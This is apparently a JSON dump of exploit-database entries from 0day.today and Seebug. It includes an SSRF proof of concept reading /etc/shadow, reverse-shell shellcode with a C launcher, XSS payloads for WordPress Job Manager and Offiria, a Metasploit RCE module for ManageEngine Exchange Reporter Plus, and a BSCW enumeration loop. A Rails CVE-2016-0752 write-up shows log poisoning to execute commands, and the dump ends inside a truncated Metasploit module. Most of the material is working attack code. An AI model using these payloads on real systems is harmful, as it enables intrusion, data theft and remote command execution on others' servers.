{"zdt": [{"lastseen": "2018-08-13T06:16:47", "bulletinFamily": "exploit", "description": "Exploit for java platform in category web applications", "modified": "2018-08-12T00:00:00", "published": "2018-08-12T00:00:00", "id": "1337DAY-ID-30870", "href": "https://0day.today/exploit/description/30870", "title": "Wavemaker Studio 6.6 - Server-Side Request Forgery Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).\r\n# Exploit Author: Gionathan \"John\" Reale\r\n# Vendor Homepage: http://www.wavemaker.com/\r\n# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/\r\n# Affected Version: 6.6\r\n# Tested on: Parrot OS\r\n# CVE : N/A\r\n \r\n# Description\r\n# Wavemaker Studio 6.6 contains an exploitable unvalidated parameter allowing an \r\n# attacker to pass dangerous content to a victim via a phishing link. The vulnerability\r\n# can also be exploited to access sensitive data or to use the server hosting Wavemaker\r\n# as a form of HTTP proxy among other things.\r\n \r\n# Proof Of Concept\r\nhttp://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/\r\nhttp://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow\r\n \r\n# Vulnerable Code\r\n# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java\r\n \r\n# Line 419-430\r\n@ExposeToClient\r\npublic String getContent(String inUrl) throws IOException {\r\n try {\r\n String str = getRemoteContent(inUrl);\r\n str = str.replace(\"<head>\", \"<head><base href='\" + inUrl\r\n + \"' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>\");\r\n return str;\r\n } catch (Exception e) {\r\n return \"\";\r\n }\r\n}\n\n# 0day.today [2018-08-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30870"}, {"lastseen": "2018-07-17T16:00:07", "bulletinFamily": 
"exploit", "description": "Exploit for linux/x86-64 platform in category shellcode", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30733", "href": "https://0day.today/exploit/description/30733", "title": "Linux/x64 - Reverse (::1:1337/TCP) + IPv6 + Password (pwnd) #Shellcode (115 bytes)", "type": "zdt", "sourceData": "/*\r\n; Title : Reverse Shell (IPv6) with Password - Shellcode\r\n; Author : Hashim Jawad @ihack4falafel\r\n; OS : Linux kali 4.15.0-kali2-amd64 #1 SMP Debian 4.15.11-1kali1 (2018-03-21) x86_64 GNU/Linux\r\n; Arch : x86_64\r\n; Size : 115 bytes\r\n \r\nsection .text\r\n \r\nglobal _start\r\n \r\n_start:\r\n \r\n ; int socket(int domain, int type, int protocol)\r\n ; rax=41, rdi=10, rsi=1, rdx=0\r\n xor esi,esi\r\n mul esi \r\n inc esi\r\n push 10 \r\n pop rdi\r\n add al, 41\r\n syscall\r\n \r\n ; save socket fd in rdi\r\n xchg rbx,rax\r\n \r\n ; struct sockaddr_in6 struct\r\n push rdx ; scope id = 0\r\n mov rcx,0xFEFFFFFFFFFFFFFF ; link local address ::1\r\n not rcx\r\n push rcx\r\n push rdx\r\n push rdx ; sin6_flowinfo=0\r\n push word 0x3905 ; port 1337\r\n push word 10 ; sin6_family\r\n \r\n ; int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen)\r\n ; rax=42, rdi=rbx(fd), rsi=sockaddr_inet6, rdx=28 (length)\r\n push rbx\r\n pop rdi\r\n push rsp\r\n pop rsi\r\n push 28\r\n pop rdx\r\n push 42\r\n pop rax\r\n syscall\r\n \r\n ; dup2 (new, old)\r\n ; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)\r\n xchg rsi, rax\r\n push 0x3\r\n pop rsi\r\n_loop:\r\n push 0x21\r\n pop rax\r\n dec esi\r\n syscall\r\n loopnz _loop\r\n \r\n ; read (int fd, void *bf, size_t count)\r\n ; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)\r\n xor rax, rax\r\n push rax\r\n pop rdi\r\n push rax\r\n push rsp\r\n pop rsi\r\n push 0x4\r\n pop rdx\r\n syscall\r\n \r\n ; check passcode (pwnd)\r\n push 0x646e7770\r\n pop rbx\r\n cmp dword [rsi], ebx\r\n jne _nop\r\n \r\n ; int execve(cont char *filename, char *const 
argv[], char *const envp[])\r\n ; rax=59, rdi=/bin//sh, rsi=0, rdx=0\r\n xor rax, rax\r\n push rax\r\n mov rbx, 0x68732f2f6e69622f\r\n push rbx\r\n push rsp\r\n pop rdi\r\n push rax\r\n push rsp\r\n pop rsi\r\n cdq\r\n push 0x3b\r\n pop rax\r\n syscall\r\n \r\n_nop:\r\n nop\r\n*/\r\n \r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xf6\\xf7\\xe6\\xff\\xc6\\x6a\\x0a\\x5f\\x04\\x29\\x0f\\x05\\x48\\x93\\x52\\x48\\xb9\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xfe\\x48\\xf7\\xd1\\x51\\x52\\x52\\x66\\x68\\x05\\x39\\x66\\x6a\\x0a\\x53\\x5f\\x54\\x5e\\x6a\\x1c\\x5a\\x6a\\x2a\\x58\\x0f\\x05\\x48\\x96\\x6a\\x03\\x5e\\x6a\\x21\\x58\\xff\\xce\\x0f\\x05\\xe0\\xf7\\x48\\x31\\xc0\\x50\\x5f\\x50\\x54\\x5e\\x6a\\x04\\x5a\\x0f\\x05\\x68\\x70\\x77\\x6e\\x64\\x5b\\x39\\x1e\\x75\\x1a\\x48\\x31\\xc0\\x50\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x54\\x5f\\x50\\x54\\x5e\\x99\\x6a\\x3b\\x58\\x0f\\x05\\x90\";\r\n \r\nmain()\r\n{\r\n \r\nprintf(\"Shellcode Length: %d\\n\", (int)strlen(code));\r\n \r\nint (*ret)() = (int(*)())code;\r\n \r\nret();\r\n \r\n}\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30733"}, {"lastseen": "2018-07-16T18:04:58", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-07-16T00:00:00", "published": "2018-07-16T00:00:00", "id": "1337DAY-ID-30724", "href": "https://0day.today/exploit/description/30724", "title": "Wordpress Job Manager 4.1.0 Plugin - Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Wordpress Plugin Job Manager v4.1.0 Stored Cross Site\r\nScripting\r\n# Google Dork: N/A\r\n# Date: 2018-07-15\r\n# Exploit Author: Berk Dusunur & Selimcan Ozdemir\r\n# Vendor Homepage: https://wpjobmanager.com\r\n# Software Link:\r\nhttps://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip\r\n# Affected Version: v4.1.0\r\n# Tested on: 
Parrot OS / WinApp Server\r\n# CVE : N/A\r\n \r\n# Proof Of Concept\r\n \r\n \r\nPOST\r\n/post-a-job/?step=%00foymtv%22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv\r\nHTTP/1.1\r\nHost: target\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101\r\nFirefox/59.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer:\r\nhttps://target/post-a-job/?step=%00foymtv22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv\r\nContent-Type: multipart/form-data;\r\nboundary=---------------------------3756777582569023921817540904\r\nContent-Length: 2379\r\nCookie: wp-job-manager-submitting-job-id=88664;\r\nwp-job-manager-submitting-job-key=5ae8875580aff\r\nDNT: 1\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nCache-Control: max-age=0\r\n \r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_title\"\r\n \r\nteertert</p></body><script>alert('1')</script>\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_description\"\r\n \r\ntest</p></div></div><form input=\"\"><p></p><script>alert('1')</script><a\r\nhref=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">test</a>\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_region\"\r\n \r\n184\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_type\"\r\n \r\n2\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; 
name=\"application\"\r\n \r\nwww.google.com\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_location\"\r\n \r\nAdelaide, Australia\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_name\"\r\n \r\nteertert</p></body><script>alert('1')</script>\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_tagline\"\r\n \r\nteertert</p></body><script>alert('1')</script>\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_website\"\r\n \r\nwww.google.com\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_logo\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n \r\n \r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_poster_name\"\r\n \r\nteertert</p></body><script>alert('1')</script>\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_poster_email\"\r\n \r\n[email\u00a0protected]\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_manager_form\"\r\n \r\nsubmit-job\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_id\"\r\n \r\n0\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"step\"\r\n \r\n \r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"submit_job\"\r\n \r\nPreview\r\n-----------------------------3756777582569023921817540904--\n\n# 0day.today [2018-07-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30724"}, {"lastseen": "2018-07-13T03:59:18", "bulletinFamily": "exploit", "description": "This 
Metasploit module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus versions 5310 and below, caused by execution of bcp.exe file inside ADSHACluster servlet", "modified": "2018-07-13T00:00:00", "published": "2018-07-13T00:00:00", "id": "1337DAY-ID-30712", "href": "https://0day.today/exploit/description/30712", "title": "#ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability that\r\n exists in Exchange Reporter Plus <= 5310, caused by execution of\r\n bcp.exe file inside ADSHACluster servlet\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Kacper Szurek <[email\u00a0protected]>'\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html']\r\n ],\r\n 'Platform' => ['win'],\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' => [['Automatic', {}]],\r\n 'DisclosureDate' => 'Jun 28 2018',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, 'The URI of the application', '/']),\r\n Opt::RPORT(8181),\r\n ])\r\n\r\n end\r\n\r\n def bin_to_hex(s)\r\n s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')\r\n })\r\n\r\n unless res\r\n vprint_error 'Connection 
failed'\r\n return CheckCode::Safe\r\n end\r\n\r\n unless res.code == 200\r\n vprint_status 'Target is not Manage Engine Exchange Reporter Plus'\r\n return CheckCode::Safe\r\n end\r\n\r\n begin\r\n json = res.get_json_document\r\n raise if json.empty? || !json['BUILD_NUMBER']\r\n rescue\r\n vprint_status 'Target is not Manage Engine Exchange Reporter Plus'\r\n return CheckCode::Safe\r\n end\r\n\r\n vprint_status \"Version: #{json['BUILD_NUMBER']}\"\r\n\r\n if json['BUILD_NUMBER'].to_i <= 5310\r\n return CheckCode::Appears\r\n end\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),\r\n 'vars_post' => {\r\n 'MTCALL' => \"nativeClient\",\r\n 'BCP_RLL' => \"0102\",\r\n 'BCP_EXE' => bin_to_hex(generate_payload_exe)\r\n }\r\n })\r\n end\r\nend\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30712"}, {"lastseen": "2018-03-13T20:30:43", "bulletinFamily": "exploit", "description": "RedTeam Pentesting discovered an information disclosure vulnerability in OrbiTeam's BSCW collaboration software. An unauthenticated attacker can disclose metadata about internal objects which are stored in BSCW. Versions 5.0.7 and below are affected.", "modified": "2014-05-09T00:00:00", "published": "2014-05-09T00:00:00", "id": "1337DAY-ID-22226", "href": "https://0day.today/exploit/description/22226", "type": "zdt", "title": "OrbiTeam BSCW 5.0.7 Metadata Information Disclosure Vulnerability", "sourceData": "RedTeam Pentesting discovered an information disclosure vulnerability in\r\nOrbiTeam's BSCW collaboration software. 
An unauthenticated attacker can\r\ndisclose metadata about internal objects which are stored in BSCW.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: BSCW\r\nAffected Versions: BSCW <=5.0.7\r\nFixed Versions: BSCW >=5.0.8\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: medium\r\nVendor URL: http://www.bscw.de/english/product.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003\r\nAdvisory Status: published\r\nCVE: CVE-2014-2301\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"The BSCW shared workspace system is the tool of choice for efficient\r\ngroup collaboration. BSCW permits the creation of documents,\r\nappointments, contacts, tasks and notes within shared workspaces.\r\nWithout having to install additional software, team members can access\r\nthis data around-the-clock, from anywhere in the world. Mission-critical\r\ninformation is constantly available to all authorised personnel\r\nregardless of location, ensuring that complex workflows can be\r\ncoordinated with minimal effort.\"\r\n\r\n(from OrbiTeam's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nBSCW uses the URL parameter \"op\" to select different functions of the\r\napplication. For example the password reset dialog can be used by\r\nopening the following URL:\r\n\r\nhttps://www.example.com/pub/bscw.cgi/?op=chpwd\r\n\r\nThe server maps the value provided by the parameter \"op\" to locally\r\nstored python modules which provide handler functions that are called to\r\ngenerate HTTP responses. 
It was discovered that sensitive metadata about\r\ninternally stored objects of BSCW can be disclosed by using the \"inf\"\r\noperation.\r\n\r\nWhen opening the following URL, the filename of a document which\r\nis identified by the value \"12345\" is disclosed in the response\r\nsent by the server (output shortened):\r\n\r\n$ curl --header 'Cookie: _pub_bscws=\"e4efb9e7ace7a12de82aa7a4aff1ab2a:1\"' \\\r\n \"http://www.example.com/pub/bscw.cgi/12345?op=inf\"\r\n[...]\r\n<table summary=\"\" class=\"iTab\" border=\"0\" cellspacing=\"1\" cellpadding=\"4\" width=\"440\">\r\n <tr valign=\"top\">\r\n <td class=\"iLabel\" id=\"small\" width=\"88\">Name</td>\r\n <td class=\"iValueB\" width=\"352\">Contract-XXXXX.doc</td>\r\n </tr>\r\n</table>\r\n[...]\r\n\r\nThe cookie used in the above command is generated by requesting the\r\nlogin page of BSCW. It is not necessary to enter credentials.\r\n\r\nBy iterating over the ids which are assigned in ascending order,\r\nattackers can enumerate the names of all objects stored in BSCW without\r\nprior authentication. 
This includes filenames and email addresses.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nWhen the following loop is run with a valid (but unauthenticated) BSCW\r\ncookie, it will find names for the BSCW objects 10000 to 30000:\r\n\r\n$ for id in `seq 10000 30000`; do\r\n filename=`curl --silent --header 'Cookie: _pub_bscws=\"COOKIE_COOKIE_COOKIE\"' \\\r\n \"http://www.example.com/pub/bscw.cgi/${id}?op=inf\" | \\\r\n grep \"iValueB\" | \\\r\n sed -e 's;^.*<td class=\"iValueB\" width=\"352\">\\(.*\\)</td>.*$;\\1;'`\r\n echo \"${id}: ${filename}\"\r\ndone\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nIt may be possible to add another authentication layer, for example\r\nHTTP-Authentication, to limit access to this BSCW information disclosure\r\nto persons authorized to use BSCW anyway.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to version 5.0.8.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe risk is estimated to be medium. This vulnerability does not allow\r\nattackers to access files stored in BSCW. 
They can however retrieve\r\nfilenames, which may be enough to draw conclusions about the\r\ncorresponding file contents, and other potentially sensitive data such\r\nas email addresses.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-02-20 Vulnerability identified\r\n2014-03-04 Customer approved disclosure to vendor\r\n2014-03-06 CVE number requested and assigned\r\n2014-03-07 Vendor notified\r\n2014-03-10 Vendor acknowledges vulnerability\r\n2014-04-22 Vendor released fixed version\r\n2014-05-08 Advisory released\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22226"}, {"lastseen": "2018-04-13T05:42:20", "bulletinFamily": "exploit", "description": "Offiria version 2.1.0 suffers from a cross site scripting vulnerability.", "modified": "2014-05-08T00:00:00", "published": "2014-05-08T00:00:00", "id": "1337DAY-ID-22216", "href": "https://0day.today/exploit/description/22216", "type": "zdt", "title": "Offiria 2.1.0 Cross Site Scripting Vulnerability", "sourceData": "Product: Offiria\r\nVendor: Slashes & Dots Sdn Bhd.\r\nVulnerable Version(s): 2.1.0 and probably prior\r\nTested Version: 2.1.0\r\nAdvisory Publication: April 2, 2014 [without technical details]\r\nVendor Notification: April 2, 2014 \r\nPublic Disclosure: May 7, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-2689\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered a vulnerability in Offiria, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users of the vulnerable application.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Offiria: CVE-2014-2689\r\n\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data in the URI after the \"/installer/index.php\" script, which is not removed from the system by default. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.\r\n\r\n\r\nThe following exploitation example displays the word \"immuniweb\":\r\n\r\nhttp://[host]/installer/index.php/%22onmouseover%3d%22alert%28%27immuniweb%27%29;%22%3d%22%3E\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nCurrently we are not aware of any official solution for this vulnerability. The vendor did not respond to:\r\n- 6 notifications by email\r\n- 1 notification via twitter\r\n- 1 notification via GitHub\r\n\r\nAs a temporary solution it is recommended to remove the vulnerable script or restrict access to it via an .htaccess file or a WAF.\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22216"}], "seebug": [{"lastseen": "2017-11-19T12:18:41", "bulletinFamily": "exploit", "description": "If your application uses a dynamic template path (for example `render params[:id]`), it is exposed to remote code execution and local file inclusion. Upgrade Rails to the latest version, or refactor your `controllers`.\r\n\r\nWe will show how, under specific conditions, code execution and local file inclusion can be used against Ruby on Rails.\r\nRails controllers can render a specified file. For example, when the show action is called and no other render call is defined, the framework implicitly renders the `show.html.erb` file.\r\n\r\n> In most cases, developers output different formats, such as text, JSON, XML or anything else, or view a file; in those cases a template language that can render dynamically, such as ERB, HAML or something else, is used. There are several ways to change what they display; for our purposes, we only need to focus on the render method. The Rails documentation defines several ways to render templates and define content, including the `file:` parameter that specifies the path of a template.\r\n\r\n\r\nIf you have already read the [documentation on rendering](http://guides.rubyonrails.org/layouts_and_rendering.html) but are not sure whether you need this functionality, you are not the only one with that doubt. Let us first look at the following code:\r\n\r\n```\r\ndef show\r\n render params[:template]\r\nend\r\n```\r\n\r\nThis code looks simple: a controller that only renders a template, selected by a `template` parameter. But the parameter is not filtered, and Rails goes looking for the specified template. Where is that template? In the views directory, the root directory, or somewhere else? Does it expect a template file name, a file name with a particular extension, or a full path? We carry on exploring with these open questions.\r\n\r\n<br>\r\n\r\n### Answering the questions\r\n\r\n**The dynamic render mechanism is a prime example of one function solving many problems. That is also where its problem lies.**\r\n\r\nLet us assume the render mechanism reads files from the path `app/views/user/#{params[:template]}`, which seems a reasonable guess. If we set the template parameter to dashboard, it loads `app/views/user/dashboard.{ext}`, where .ext is a whitelisted extension (such as .html, .haml, .html.erb, etc.)\r\n\r\n\r\n\r\nNow let us think about what happens if we set template to `../admin/dashboard`. What will it return? That is hard to know in advance, but when we try it, it tells us the template is missing.\r\n\r\n\r\n\r\nLooking at the error message, we can see that it tried to find the file under `RAILS_ROOT/app/views`, `RAILS_ROOT` and the system root directory. That is somewhat unsettling: why would it look for our template file in the root directory of the system?\r\n\r\n> Following a hacker's instinct, I set the parameter to `/etc/passwd`, and we did indeed read the `passwd` file. That is a major finding.\r\n\r\n\r\n\r\nSince we can read the `passwd` file, can we also read the application's source code and configuration files? Let us set the parameter to `config/initializers/secrettoken.rb` and see.\r\n\r\n\r\n\r\n> Do not forget what caused this vulnerability: it is the choice to set the template path dynamically.\r\n\r\n```\r\ndef show\r\n render params[:template]\r\nend\r\n```\r\n\r\n> This short and simple snippet is enough to cause the vulnerability, and I believe more than a few developers write code like this. But that is not yet the worst of it.\r\n\r\nFrom Jeff Jarmoc's paper \"[The Anatomy of a Rails Vulnerability \u2013 CVE-2014-0130: From Directory Traversal to Shell,](http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf)\" we learn that a vulnerability like this can lead to remote code execution.\r\n\r\nJeff's paper describes a similar flaw in certain versions of Rails: Rails' implicit render mechanism allowed directory traversal, or more precisely **local file inclusion**. In our case the vulnerability is introduced by the developer.\r\n\r\n\r\n> Before digging deeper into this vulnerability, let us pause and think. What we have is **local file inclusion**, not directory traversal. One advantage we have is that we can **load executable files (ERB)**. Traditionally, directory traversal only returns non-executable file contents, such as a CSV file. So in essence, we can not only read the application's source code and system files, we can also execute Ruby code, which is rather impressive. Because we can execute Ruby code, we can execute system commands with the same privileges as the web server.\r\n\r\nTo go from file inclusion to code execution we use a technique called log poisoning. In the current environment every request, including its parameters, is written to a log file (such as `development.log`). Although it is a plain-text file, any log can be included as Ruby code. The whole process can be completed by sending a request with valid Ruby code as a parameter.\r\n\r\nIn the example below we send a legitimate request to the web application, passing a URL-encoded `<%= `ls` %>` in the fake parameter.\r\n\r\n\r\n\r\nAuditing the log file, we can see an entry with the URL-decoded parameter. It is valid Ruby code, and when the web application renders this log file the code is executed.\r\n\r\n\r\n\r\nWe can then use the file inclusion vulnerability to include the log containing the request we just made, and the parameter from that request is executed.\r\n\r\n\r\n\r\nWhen the response comes back, we can see that the original value of the fake parameter has been replaced by the output of the `ls` command. Other commands can be executed in the same way.\r\n\r\n<br>\r\n\r\n### Conclusion\r\n\r\nWithout digging into the details or actively attempting an exploit, the Rails render mechanism remains mysterious and hard to understand. Unfortunately, the Rails reference documentation is not much help here.\r\n\r\nSimilar to CVE-2014-0130, dynamic template rendering leads to directory traversal and code execution. I have seen this vulnerability in many open-source Rails projects, more than once. If you have not read Jeff Jarmoc's paper yet, I recommend reading it first; it digs deeply into the vulnerability and the impact assessment related to CVE-2014-0130.\r\n\r\nHere is the msf module I wrote to detect and exploit the vulnerability described in this article: https://gist.github.com/forced-request/5158759a6418e6376afb\r\n\r\n\r\n\r\n \r\n> The Chinese translation above comes from: https://www.92aq.com/2016/01/27/ruby-on-rails-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C.html\r\n> Original English article: https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/\r\n\r\n\r\n<br>\r\n\r\n### Timeline\r\n\r\n* 2015-02-01 Vulnerability discovered\r\n* 2015-02-10 Rails team decides to fix the vulnerability\r\n* 2015-07-13 Vulnerability confirmed privately (5 months after the first report)\r\n* 2016-01-25 Patch for the vulnerability officially released and the vulnerability assigned a CVE (almost 5 months to confirm, almost 1 year to fix)\r\n* 2016-01-27 Seebug records the vulnerability\r\n\r\n<br/>\r\n\r\n### Proof of vulnerability\r\n\r\n**Vulnerable application**\r\n\r\nTest environment: Rails-4.1.5 (Ruby-2.1.5)\r\nTest system: Kali Linux 2.0\r\n\r\nCreate the Rails application:\r\n\r\n```\r\nrails new cve-2016-0752\r\ncd cve-2016-0752\r\n```\r\n\r\nUse the built-in command to create the controller `vuln` with the route `index`, then modify its default handler code:\r\n\r\n```\r\nrails generate controller vuln index\r\n```\r\n\r\nChange the `index` function in `app/controllers/vuln_controller.rb` to:\r\n\r\n```\r\nclass VulnController < ApplicationController\r\n def index\r\n render params[:q]\r\n end\r\nend\r\n```\r\n\r\nStart the application and visit `http://192.168.199.205:3000/vuln/index?q=/etc/passwd`. The code passes `/etc/passwd` to the render function as a relative template name. When looking for template files, render includes the system root path by default, so when `/etc/passwd` cannot be found in the application's default template directory it goes on to look for `//etc/passwd`. If the `//etc/passwd` file is accessible, the application renders its contents as a template:\r\n\r\n\r\n\r\n**Executing commands via the access log**\r\n\r\nThe Rails application file log/development.log stores the user access log. Since section 2.1 has shown that the path of the rendered template file can be controlled, the content of the rendered template can be controlled through the access log. Using the Rails template engine, insert the template element <%= `ifconfig` %> into the template content, which returns the result of the ifconfig system command as rendered content.\r\n\r\nVisiting http://192.168.199.205:3000/vuln/index?q=<%25=%20`ifconfig`%20%25> leaves a record in log/development.log:\r\n\r\n\r\n\r\nNow, by making log/development.log the rendered template file, the target host's network information is returned in the page result, http://192.168.199.205:3000/vuln/index?q=../../log/development.log:\r\n\r\n\r\n\r\n### Impact\r\n\r\nSearching zoomeye.org for sites that use the Rails framework:\r\n\r\n\r\n\r\nAround **120,000** sites worldwide that use Rails are **potentially** affected by this vulnerability.\r\n\r\nYou can also search GitHub for `render params` to see potentially affected 
\u9879\u76ee:\r\n\r\n\r\n\r\n\u53ef\u4ee5\u770b\u5230\u4e5f\u6709\u5927\u91cf\u7684\u9879\u76ee\u7b26\u5408\u8fd9\u6837\u7684\u4ee3\u7801\u5199\u6cd5,\u53ef\u80fd\u53d7\u5230\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002", "modified": "2016-01-27T00:00:00", "published": "2016-01-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90633", "id": "SSV:90633", "type": "seebug", "title": "Rails Dynamic Render \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e (CVE-2016-0752)", "sourceData": "\n require 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n @@trav_string = '%5c%2e%2e%2f'\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ruby on Rails Dynamic Render Directory Traversal + Code Exec',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in the explicit render\r\n method when leveraging user parameters.\r\n This module has been tested across multiple versions of RoR 3.x and RoR 4.x\r\n The technique used by this module requires the specified endpoint to be using\r\n dynamic render paths, such as the following example:\r\n def show\r\n render params[:id]\r\n end\r\n },\r\n 'Author' =>\r\n [\r\n 'John Poulin (forced-request)'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'ruby',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' => \r\n {\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl telnet'\r\n }\r\n },\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n [ 'CMD',\r\n {\r\n 